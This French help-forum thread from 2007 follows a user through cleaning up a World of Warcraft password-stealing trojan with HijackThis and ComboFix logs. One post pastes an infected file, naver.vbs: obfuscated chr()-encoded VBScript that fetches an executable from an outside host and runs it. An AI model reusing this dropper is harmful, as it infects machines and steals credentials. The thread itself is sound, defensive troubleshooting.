alerte virus ( Generic.PWS.WoW.B61FF478)...... BXXXXX

[julien88]

Bonjour à tous,

 

Cela fait deja 2 fois que bitdefender 10 me detecte plusieurs intrusions pas le virus Genric.PWS.WoW.B61FF478 ; avec le code

B61FF478 qui change à chaque virus par un autre code....

J'ai cherché un peu sur le net et j'ai trouvé sa : autre probleme avec se virus

Et j'ai donc installé le logiciel Hijackthis en suivant sa : tuto installation hijackthis

Mais pour la suite j'aimerais que quelqu'un m'aide personnellement car je ne sais pas si le probleme que j'ai trouvé sur le net est le meme que le mien .Et je ne suis pas un pro de hijackthis en plus

 

Donc j'aimerais bien que vous m'aidiez a éliminer se virus et qu'il ne revienne plus si possible

 

 

merci d'avance a tous

[bruce lee]

Bonjour julien88,

 

- Télécharge Hijackthis V 2.02 http://www.trendsecure.com/portal/en-US/th.../HJTInstall.exe enregistre ce fichier sur le bureau.

 

- Fais un double clic sur HJTInstall.exe afin de lancer l'installation

 

- Clique sur Install ensuite sur I Accept

 

- Clique sur Do a scan system and save log file

 

- Le Bloc-notes s'ouvrira fais un copier coller de tout son contenu ici dans ta prochaine réponse.

 

En cas de problèmes suit ce tuto: http://cybersecurite.xooit.com/t138-Hijack...-2-0-2.htm#1185

 

 

Merci de me poster le rapport de Bitdefender.

[julien88]

Voila j'avais mi mon hijackthis dans le disque c dans un dossier nommé hijackthis comme dans les tuto que j'ai donné mais je ne pense pas que sa change quelque chose, je n'est plus les rapport bitdefender j'ai fermé la fenetre mais peut etre peut ont les avoir quelque part d'autre ?

 

mon rapport hijackthis :

 

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 00:19:32, on 01/02/2004

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Boot mode: Normal

 

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Program Files\Bonjour\mDNSResponder.exe

C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe

C:\Program Files\Symantec\Norton Ghost 2003\GhostStartService.exe

C:\WINDOWS\system32\slserv.exe

C:\Program Files\Fichiers communs\Softwin\BitDefender Communicator\xcommsvr.exe

C:\Program Files\Fichiers communs\Softwin\BitDefender Update Service\livesrv.exe

C:\WINDOWS\Explorer.EXE

C:\WINDOWS\system32\Rundll32.exe

C:\WINDOWS\system32\keyhook.exe

C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe

C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe

C:\Program Files\Symantec\Norton Ghost 2003\GhostStartTrayApp.exe

C:\Program Files\Softwin\BitDefender10\bdmcon.exe

C:\Program Files\Softwin\BitDefender10\bdagent.exe

C:\WINDOWS\system32\ctfmon.exe

C:\Program Files\Fichiers communs\Ahead\lib\NMBgMonitor.exe

C:\Program Files\MSN Messenger\MsnMsgr.Exe

C:\Program Files\Messenger\msmsgs.exe

C:\WINDOWS\system32\sistray.exe

C:\WINDOWS\System32\wbem\wmiapsrv.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\wscntfy.exe

C:\WINDOWS\System32\svchost.exe

C:\Program Files\Mozilla Firefox\firefox.exe

C:\Program Files\CCleaner\ccleaner.exe

C:\Program Files\Fichiers communs\Softwin\BitDefender Scan Server\bdss.exe

C:\Program Files\Softwin\BitDefender10\vsserv.exe

C:\Hijackthis\HijackThis.exe

 

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens

O2 - BHO: flashget urlcatch - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\Program Files\FlashGet\jccatch.dll

O2 - BHO: BitComet ClickCapture - {39F7E362-828A-4B5A-BCAF-5B79BFDFEA60} - C:\Program Files\BitComet\tools\BitCometBHO_1.1.5.19.dll

O2 - BHO: VMN Toolbar - {4E7BD74F-2B8D-469E-8DA9-FD60BB9AAE33} - C:\PROGRA~1\VMNTOO~1\VMNTOO~1.DLL

O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll

O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll

O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)

O2 - BHO: FlashGet GetFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\Program Files\FlashGet\getflash.dll

O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Program Files\Canon\Easy-WebPrint\Toolband.dll

O3 - Toolbar: VMN Toolbar - {4E7BD74F-2B8D-469E-8DA9-FD60BB9AAE33} - C:\PROGRA~1\VMNTOO~1\VMNTOO~1.DLL

O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe

O4 - HKLM\..\Run: [siSPower] Rundll32.exe SiSPower.dll,ModeAgent

O4 - HKLM\..\Run: [siS Windows KeyHook] C:\WINDOWS\system32\keyhook.exe

O4 - HKLM\..\Run: [siSUSBRG] C:\WINDOWS\SiSUSBrg.exe

O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe"

O4 - HKLM\..\Run: [GhostStartTrayApp] C:\Program Files\Symantec\Norton Ghost 2003\GhostStartTrayApp.exe

O4 - HKLM\..\Run: [DiskeeperSystray] "C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe"

O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Adobe Photoshop Lightroom\apdproxy.exe"

O4 - HKLM\..\Run: [PWRISOVM.EXE] C:\Program Files\PowerISO\PWRISOVM.EXE

O4 - HKLM\..\Run: [bDMCon] "C:\Program Files\Softwin\BitDefender10\bdmcon.exe" /reg

O4 - HKLM\..\Run: [bDAgent] "C:\Program Files\Softwin\BitDefender10\bdagent.exe"

O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe

O4 - HKCU\..\Run: [bgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Fichiers communs\Ahead\lib\NMBgMonitor.exe"

O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background

O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background

O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SERVICE LOCAL')

O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SERVICE RÉSEAU')

O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')

O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')

O4 - Global Startup: Utility Tray.lnk = C:\WINDOWS\system32\sistray.exe

O8 - Extra context menu item: &Tout télécharger avec FlashGet - C:\Program Files\FlashGet\jc_all.htm

O8 - Extra context menu item: &Télécharger avec FlashGet - C:\Program Files\FlashGet\jc_link.htm

O8 - Extra context menu item: Download all links using BitComet - res://C:\Program Files\BitComet\BitComet.exe/AddAllLink.htm

O8 - Extra context menu item: Download all videos using BitComet - res://C:\Program Files\BitComet\BitComet.exe/AddVideo.htm

O8 - Extra context menu item: Download link using &BitComet - res://C:\Program Files\BitComet\BitComet.exe/AddLink.htm

O8 - Extra context menu item: Easy-WebPrint Ajouter à la liste d'impressions - res://C:\Program Files\Canon\Easy-WebPrint\Resource.dll/RC_AddToList.html

O8 - Extra context menu item: Easy-WebPrint Impression rapide - res://C:\Program Files\Canon\Easy-WebPrint\Resource.dll/RC_HSPrint.html

O8 - Extra context menu item: Easy-WebPrint Imprimer - res://C:\Program Files\Canon\Easy-WebPrint\Resource.dll/RC_Print.html

O8 - Extra context menu item: Easy-WebPrint Prévisualiser - res://C:\Program Files\Canon\Easy-WebPrint\Resource.dll/RC_Preview.html

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll

O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll

O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll

O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll

O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe

O9 - Extra 'Tools' menuitem: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe

O17 - HKLM\System\CCS\Services\Tcpip\..\{4A89B528-AD91-4FD4-870D-E14D4EEA0594}: NameServer = 192.168.0.5

O17 - HKLM\System\CS1\Services\Tcpip\..\{4A89B528-AD91-4FD4-870D-E14D4EEA0594}: NameServer = 192.168.0.5

O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe

O23 - Service: BitDefender Scan Server (bdss) - Unknown owner - C:\Program Files\Fichiers communs\Softwin\BitDefender Scan Server\bdss.exe

O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Apple Computer, Inc. - C:\Program Files\Bonjour\mDNSResponder.exe

O23 - Service: Diskeeper - Diskeeper Corporation - C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe

O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Fichiers communs\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe

O23 - Service: GhostStartService - Symantec Corporation - C:\Program Files\Symantec\Norton Ghost 2003\GhostStartService.exe

O23 - Service: BitDefender Desktop Update Service (LIVESRV) - SOFTWIN S.R.L. - C:\Program Files\Fichiers communs\Softwin\BitDefender Update Service\livesrv.exe

O23 - Service: SmartLinkService (SLService) - - C:\WINDOWS\SYSTEM32\slserv.exe

O23 - Service: BitDefender Virus Shield (VSSERV) - SOFTWIN S.R.L. - C:\Program Files\Softwin\BitDefender10\vsserv.exe

O23 - Service: wampapache - Apache Software Foundation - c:\wamp\apache2\bin\httpd.exe

O23 - Service: wampmysqld - Unknown owner - c:\wamp\mysql\bin\mysqld-nt.exe

O23 - Service: BitDefender Communicator (XCOMM) - SOFTWIN S.R.L - C:\Program Files\Fichiers communs\Softwin\BitDefender Communicator\xcommsvr.exe

 

--

End of file - 8672 bytes

 

merci d'avance

[bruce lee]

Re,

 

1. Télécharge combofix.exe (par sUBs) ici :

 

http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe

 

http://download.bleepingcomputer.com/sUBs/Beta/ComboFix.exe

 

sur ton Bureau.

 

2. Double clique sur combofix.exe puis tape 1 pour lancer le scan.

3. Lorsque le scan sera complété, un rapport apparaîtra. Copie/colle ce rapport dans ta prochaine réponse.

[julien88]

Sa met du temp a scanner c'est normal ?

[julien88]

J'ai rien obtenu, le logiciel a fait redemarer et j'ai pas de fichier à copier/coller et en plus j'ai plus l'heure dans la barre de tache J'ai du la remmetre manuellement

Cela peut il venir que j'ai pas de pile systeme ?

 

Personne peut m'aider ?!

Modifié le 21 août 2007 par julien88

[bruce lee]

Re,

 

Le fichier se trouve ici: C:\combofix.txt

 

@+

[julien88]

Je n'est pas se genre de fichier dans mon disque c mais j'ai un fichier qui me semble suspect (naver.vbs un fichier systeme avec un vers ? )

Et j'ai aussi un dossier QOobox . Quesque c'est que tout sa ?

Sachant que mon systeme ralenti fortement en ce moment ?

 

J'ai ouvert le fichier vbs avec le bloc note et sa me marque sa :

Set Post=CreateObject("Msxml2.XMLHTTP")

execute(chr(83)&chr(101)&chr(116)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(61)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr

(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(87)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(104)

&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(58)&chr(97)&chr(53)&chr(32)&chr(61)&chr(32)&chr(34)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)

&chr(47)&chr(109)&chr(121)&chr(46)&chr(100)&chr(114)&chr(101)&chr(97)&chr(109)&chr(119)&chr(105)&chr(122)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(103)

&chr(118)&chr(118)&chr(103)&chr(47)&chr(112)&chr(107)&chr(46)&chr(101)&chr(120)&chr(101)&chr(34)&chr(58)&chr(97)&chr(52)&chr(32)&chr(61)&chr(32)&chr(34)&chr(67)

&chr(58)&chr(92)&chr(80)&chr(114)&chr(111)&chr(103)&chr(114)&chr(97)&chr(126)&chr(49)&chr(92)&chr(73)&chr(110)&chr(116)&chr(101)&chr(114)&chr(110)&chr(126)&chr(49)

&chr(92)&chr(116)&chr(101)&chr(109)&chr(112)&chr(49)&chr(46)&chr(101)&chr(120)&chr(101)&chr(34)&chr(58)&chr(97)&chr(51)&chr(32)&chr(61)&chr(32)

&chr(34)&chr(71)&chr(69)&chr(84)&chr(34)&chr(58)&chr(80)&chr(111)&chr(115)&chr(116)&chr(46)&chr(79)&chr(112)&chr(101)&chr(110)&chr(32)&chr(97)&chr(51)&chr(44)&chr(97)

&chr(53)&chr(44)&chr(48)&chr(58)&chr(80)&chr(111)&chr(115)&chr(116)&chr(46)&chr(83)&chr(101)&chr(110)&chr(100)&chr(40)&chr(41)&chr(58)&chr(97)&chr(49)&chr(32)&chr(61)&chr(32)

&chr(34)&chr(65)&chr(100)&chr(111)&chr(100)&chr(98)&chr(46)&chr(34)&chr(58)&chr(97)&chr(50)&chr(32)&chr(61)&chr(32)&chr(34)&chr(83)&chr(116)&chr(114)&chr(101)&chr(97)&chr(109)&chr(34)

&chr(58)&chr(115)&chr(116)&chr(114)&chr(49)&chr(32)&chr(61)&chr(32)&chr(97)&chr(49)&chr(38)&chr(97)&chr(50)&chr(58)&chr(83)&chr(101)&chr(116)&chr(32)&chr(97)&chr(71)&chr(101)&chr(116)

&chr(61)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(115)&chr(116)&chr(114)&chr(49)&chr(41)&chr(58)&chr(97)&chr(71)

&chr(101)&chr(116)&chr(46)&chr(77)&chr(111)

&chr(100)&chr(101)&chr(61)&chr(51)&chr(58)&chr(97)&chr(71)&chr(101)&chr(116)&chr(46)&chr(84)&chr(121)&chr(112)&chr(101)&chr(61)&chr(49)&chr(58)

&chr(97)&chr(71)&chr(101)&chr(116)&chr(46)&chr(79)&chr(112)&chr(101)&chr(110)&chr(40)&chr(41)&chr(58)&chr(97)&chr(71)&chr(101)&chr(116)&chr(46)&chr(87)&chr(114)&chr(105)&chr(116)&chr(101)&chr(40)

&chr(80)&chr(111)&chr(115)&chr(116)&chr(46)&chr(114)&chr(101)&chr(115)&chr(112)&chr(111)&chr(110)&chr(115)&chr(101)&chr(66)&chr(111)&chr(100)&chr(121)&chr(41)&chr(58)&chr(97)&chr(71)&chr(101)&chr(116)

&chr(46)&chr(83)&chr(97)&chr(118)&chr(101)&chr(84)&chr(111)&chr(70)&chr(105)&chr(108)&chr(101)&chr(32)&chr(97)&chr(52)&chr(44)&chr(50)&chr(58)&chr(119)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)

&chr(46)&chr(115)&chr(108)&chr(101)&chr(101)&chr(112)&chr(32)&chr(53)&chr(48)&chr(48)&chr(48)&chr(58)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(82)&chr(117)&chr(110)&chr(32)&chr(40)&chr(97)&chr(52)

&chr(41))

 

C'est pas espion sa ? je l'ai renommé par naver.vbs.rien au cas ou ....

Modifié le 22 août 2007 par julien88

[julien88]

Voila j'ai obtenu un rapport appelé log.txt :

 

ComboFix 07-08-22.1 - "mobile" 2004-01-31 23:27:29.2 - NTFSx86 
Microsoft Windows XP Professionnel  5.1.2600.2.1252.1.1036.18.162 [GMT 1:00]


(((((((((((((((((((((((((   Files Created from 2007-07-22 to 2007-08-22  )))))))))))))))))))))))))))))))


2007-08-20 18:19	<REP>	d--------	C:\DOCUME~1\mobile\APPLIC~1\Thunderbird
2007-08-20 18:18	<REP>	d--------	C:\Program Files\Mozilla Thunderbird
2007-08-16 12:09	236,393	--a------	C:\WINDOWS\XSite Pro Uninstaller.exe
2007-08-16 12:08	<REP>	d--------	C:\Program Files\XSite Pro
2007-08-16 12:08	<REP>	d--------	C:\Program Files\Fichiers communs\Thraex Software
2007-08-14 18:53	<REP>	d--------	C:\Program Files\vmntoolbar
2007-08-14 18:53	<REP>	d--------	C:\Program Files\Visicom Media
2007-08-14 18:53	<REP>	d--------	C:\DOCUME~1\mobile\APPLIC~1\vmntoolbar
2007-08-14 12:53	36,864	--a------	C:\WINDOWS\system32\wbsys.dll
2007-08-14 12:53	<REP>	d--------	C:\Program Files\AlienGUIse
2007-08-14 11:47	564,736	--a------	C:\WINDOWS\system32\ah.scr
2007-08-14 11:47	45,056	--a------	C:\WINDOWS\system32\sstunst3.exe
2007-08-14 11:41	39,629,592	--a------	C:\Xenomorph_slim.exe
2007-08-10 13:18	<REP>	d--------	C:\Program Files\EasyPHP1-8
2007-08-10 12:40	<REP>	d--------	C:\photoshop cs3 patch francais.pkg
2007-08-10 10:55	<REP>	d--------	C:\Program Files\Incomplete
2007-08-07 16:57	<REP>	d--------	C:\DOCUME~1\mobile\589949705
2007-08-07 16:55	74,752	--a------	C:\WINDOWS\ST6UNST.EXE
2007-08-07 16:55	253,952	---------	C:\WINDOWS\Setup1.exe
2007-08-07 16:55	<REP>	d--------	C:\Program Files\IMG-Extracteur
2007-08-05 17:53	<REP>	d--------	C:\Program Files\Install Creator
2007-08-05 17:46	<REP>	d--------	C:\Program Files\PowerISO
2007-08-05 03:27	<REP>	d--------	C:\Program Files\The Phrogram Company
2007-08-05 01:15	3,956,736	--a------	C:\FoxitReader.exe
2007-08-05 00:22	4,484	--a------	C:\WINDOWS\system32\drivers\cpuidlep.sys
2007-08-03 22:43	49,152	--a------	C:\latency.exe
2007-08-03 22:43	1,071,425	--a------	C:\cpuz.exe
2007-07-29 11:42	31,616	--a------	C:\WINDOWS\system32\drivers\usbccgp.sys
2007-07-26 21:04	682,232	--a------	C:\WINDOWS\system32\drivers\sptd.sys
2007-07-24 20:44	1,818,678	--a------	C:\Anim8or.exe
2007-07-24 19:14	<REP>	d--------	C:\DOCUME~1\mobile\APPLIC~1\UseNeXT
2007-07-24 01:25	<REP>	d--------	C:\Program Files\FileZilla


((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))

2007-08-22 23:27	81984	--a------	C:\WINDOWS\system32\bdod.bin
2007-08-14 20:30	---------	d--------	C:\Program Files\FlashGet
2007-08-10 11:15	---------	d--------	C:\Program Files\FrostWire
2007-08-10 10:56	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\FrostWire
2007-08-10 10:56	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\FrostWire
2007-07-30 17:58	---------	d--------	C:\Program Files\MagicISO
2007-07-30 14:10	359040	--a------	C:\WINDOWS\system32\drivers\TCPIP.SYS.ORIGINAL
2007-07-30 14:10	359040	--a------	C:\WINDOWS\system32\drivers\TCPIP.SYS
2007-07-29 15:09	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\gtk-2.0
2007-07-29 15:09	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\gtk-2.0
2007-07-12 22:30	---------	d--------	C:\Program Files\GIF Movie Gear
2007-07-12 15:04	---------	d--------	C:\Program Files\GIMP-2.0
2007-07-12 15:03	---------	d--------	C:\Program Files\Fichiers communs\GTK
2007-07-09 17:21	---------	d--------	C:\Program Files\Windows Live
2007-07-07 20:36	---------	d--------	C:\Program Files\eRightSoft
2007-07-05 19:19	---------	d--------	C:\Program Files\Nokia
2007-07-05 19:00	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\Nokia
2007-07-05 19:00	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\Nokia
2007-07-02 12:18	---------	d--------	C:\Program Files\Lavalys
2007-07-01 20:51	---------	d--------	C:\Program Files\Images Webscan
2007-07-01 20:22	---------	d--------	C:\Program Files\WinHTTrack
2007-06-30 23:36	---------	d--------	C:\Program Files\CCleaner
2007-06-30 23:23	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\Help
2007-06-30 23:23	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\Help
2007-06-30 23:03	---------	d--------	C:\Program Files\UxTheme Multipatcher Fr
2007-06-30 23:03	---------	d--------	C:\Program Files\Symantec
2007-06-30 23:03	---------	d--------	C:\Program Files\Fichiers communs\Symantec Shared
2007-06-30 23:03	---------	d--------	C:\DOCUME~1\ALLUSE~1\APPLIC~1\Symantec
2007-06-30 22:06	2560	--a------	C:\WINDOWS\system32\BitCometRes.dll
2007-06-30 21:50	---------	d--h-----	C:\Program Files\WindowsUpdate
2007-06-30 19:58	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\Ahead
2007-06-30 19:58	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\Ahead
2007-06-30 17:37	---------	d--------	C:\Program Files\VSO
2007-06-30 17:36	87608	--a------	C:\DOCUME~1\mobile\APPLIC~1\inst.exe
2007-06-30 17:36	47360	--a------	C:\DOCUME~1\mobile\APPLIC~1\pcouffin.sys
2007-06-30 17:36	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\Vso
2007-06-30 17:36	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\Vso
2007-06-30 17:34	47360	--a------	C:\WINDOWS\system32\drivers\pcouffin.sys
2007-06-30 16:54	---------	d--------	C:\DOCUME~1\ALLUSE~1\APPLIC~1\FLEXnet
2007-06-30 15:38	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\DeepBurner
2007-06-30 15:38	---------	d--------	C:\DOCUME~1\mobile\APPLIC~1\DeepBurner
2007-06-30 15:05	---------	d--------	C:\Program Files\Logon Loader
2007-06-30 13:48	---------	d--------	C:\Program Files\Astonsoft
2007-06-17 01:11	51200	--a------	C:\WINDOWS\nircmd.exe
2006-05-03 09:06:54	163,328	--sh--r	C:\WINDOWS\system32\flvDX.dll
2007-02-21 10:47:16	31,232	--sh--r	C:\WINDOWS\system32\msfDX.dll


(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))


*Note* empty entries & legit default entries are not shown 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NeroFilterCheck"="C:\WINDOWS\system32\NeroCheck.exe" [2001-07-09 11:50]
"SiSPower"="SiSPower.dll" [2005-08-25 20:05 C:\WINDOWS\system32\SiSPower.dll]
"SiS Windows KeyHook"="C:\WINDOWS\system32\keyhook.exe" [2005-08-25 20:02]
"SiSUSBRG"="C:\WINDOWS\SiSUSBrg.exe" [2002-07-12 19:15]
"RemoteControl"="C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe" [2004-11-02 21:24]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe" [2007-03-14 03:43]
"GhostStartTrayApp"="C:\Program Files\Symantec\Norton Ghost 2003\GhostStartTrayApp.exe" [2002-08-19 12:58]
"DiskeeperSystray"="C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe" [2005-11-22 18:38]
"Adobe Photo Downloader"="C:\Program Files\Adobe\Adobe Photoshop Lightroom\apdproxy.exe" [2007-02-06 17:30]
"PWRISOVM.EXE"="C:\Program Files\PowerISO\PWRISOVM.EXE" [2007-04-09 14:23]
"BDMCon"="C:\Program Files\Softwin\BitDefender10\bdmcon.exe" [2004-02-01 01:11]
"BDAgent"="C:\Program Files\Softwin\BitDefender10\bdagent.exe" [2004-02-01 01:11]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-19 17:09]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Fichiers communs\Ahead\lib\NMBgMonitor.exe" [2005-12-16 13:57]
"MsnMsgr"="C:\Program Files\MSN Messenger\MsnMsgr.exe" [2007-07-25 10:27]
"MSMSGS"="C:\Program Files\Messenger\msmsgs.exe" [2004-08-19 17:10]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"appinit_dlls"=sockspy.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Flashget]
"C:\Program Files\FlashGet\FlashGet.exe" /min

R1 bdftdif;BitDefender Firewall TDI Filter;\??\C:\Program Files\Fichiers communs\Softwin\BitDefender Firewall\bdftdif.sys
R1 cpuidlep;CpuIdle Pro System Driver;C:\WINDOWS\system32\drivers\cpuidlep.sys
R1 GhPciScan;GhostPciScanner;\??\C:\Program Files\Symantec\Norton Ghost 2003\ghpciscan.sys
R3 Bdfndisf;BitDefender Firewall NDIS Filter Service;C:\WINDOWS\system32\DRIVERS\bdfndisf.sys
R3 CONAN;CONAN;C:\WINDOWS\system32\drivers\o2mmb.sys
R3 MbxStby;MbxStby;C:\WINDOWS\system32\drivers\MbxStby.sys
R3 W8335XP;WL_54CB 802.11b/g Wireless LAN Adapter;C:\WINDOWS\system32\DRIVERS\MRV8335XP.sys
S3 USBSTOR;Pilote de stockage de masse USB;C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
S3 wampapache;wampapache;"c:\wamp\apache2\bin\httpd.exe" -k runservice
S3 wampmysqld;wampmysqld;c:\wamp\mysql\bin\mysqld-nt.exe --defaults-file=c:\wamp\mysql\my.ini wampmysqld


**************************************************************************

catchme 0.3.1061 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, [url=http://www.gmer.net]http://www.gmer.net[/url]
Rootkit scan 2007-08-22 11:32:30
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

Completion time: 2007-08-22 11:35:16
C:\ComboFix-quarantined-files.txt ... 2007-08-22 11:35

--- E O F ---

 

 

 

et pour le fichier Combofix-quarantined-files.txt sa done sa :

 

 

 

 

2001-12-07 11:11	  3583	--a------	C:\Qoobox\Quarantine\C\WINDOWS\SiSport.sys.vir
2007-08-20 19:42	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising163.exe.vir
2007-08-20 19:42	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising334.exe.vir
2007-08-20 19:42	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising391.exe.vir
2007-08-20 19:42	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising810.exe.vir
2007-08-20 19:42	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising832.exe.vir
2007-08-20 19:42	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising916.exe.vir
2007-08-20 19:42	  23850	--a------	C:\Qoobox\Quarantine\C\WINDOWS\297.exe.vir
2007-08-20 19:42	  23850	--a------	C:\Qoobox\Quarantine\C\WINDOWS\922.exe.vir
2007-08-20 19:42	  24550	--a------	C:\Qoobox\Quarantine\C\WINDOWS\842.exe.vir
2007-08-20 19:42	  25014	--a------	C:\Qoobox\Quarantine\C\WINDOWS\576.exe.vir
2007-08-20 19:42	  27163	--a------	C:\Qoobox\Quarantine\C\WINDOWS\229.exe.vir
2007-08-20 19:42	  27163	--a------	C:\Qoobox\Quarantine\C\WINDOWS\421.exe.vir
2007-08-20 19:42	  27163	--a------	C:\Qoobox\Quarantine\C\WINDOWS\659.exe.vir
2007-08-20 19:43	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising316.exe.vir
2007-08-20 19:43	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising433.exe.vir
2007-08-20 19:43	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising745.exe.vir
2007-08-20 19:43	  1308	--a------	C:\Qoobox\Quarantine\C\WINDOWS\rising847.exe.vir
